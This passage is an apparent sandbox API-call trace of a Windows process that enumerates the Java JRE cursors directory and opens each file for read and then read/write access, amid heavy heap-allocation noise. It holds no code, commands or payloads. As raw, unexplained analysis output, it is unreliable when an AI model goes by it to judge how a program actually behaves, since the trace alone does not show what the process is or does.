hHeap=0x20000) returned 1 [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0096.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0096.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0096.919] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\i", cAlternateFileName="")) returned 0 [0096.919] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0096.919] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0097.091] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.091] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="cursors.properties", cAlternateFileName="CURSOR~1.PRO")) returned 1 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0097.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0097.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0097.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0097.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.093] AreFileApisANSI () returned 1 [0097.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties", lpUsedDefaultChar=0x0) returned 73 [0097.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.093] AreFileApisANSI () returned 1 [0097.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0097.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0097.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 73 [0097.093] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.094] GetFileType (hFile=0x33c) returned 0x1 [0097.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0097.094] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.094] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.094] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.095] CloseHandle (hObject=0x33c) returned 1 [0097.095] AreFileApisANSI () returned 1 [0097.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0097.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0097.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 73 [0097.095] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.095] GetFileType (hFile=0x33c) returned 0x1 [0097.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0097.095] CloseHandle (hObject=0x33c) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.097] AreFileApisANSI () returned 1 [0097.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0097.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 73 [0097.097] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500)) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0097.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.097] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="invalid32x32.gif", cAlternateFileName="INVALI~1.GIF")) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0097.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0097.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0097.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.098] AreFileApisANSI () returned 1 [0097.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif", lpUsedDefaultChar=0x0) returned 71 [0097.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.098] AreFileApisANSI () returned 1 [0097.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0097.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 71 [0097.098] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.099] GetFileType (hFile=0x33c) returned 0x1 [0097.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0097.099] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.099] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.099] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.099] CloseHandle (hObject=0x33c) returned 1 [0097.099] AreFileApisANSI () returned 1 [0097.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0097.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 71 [0097.099] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, 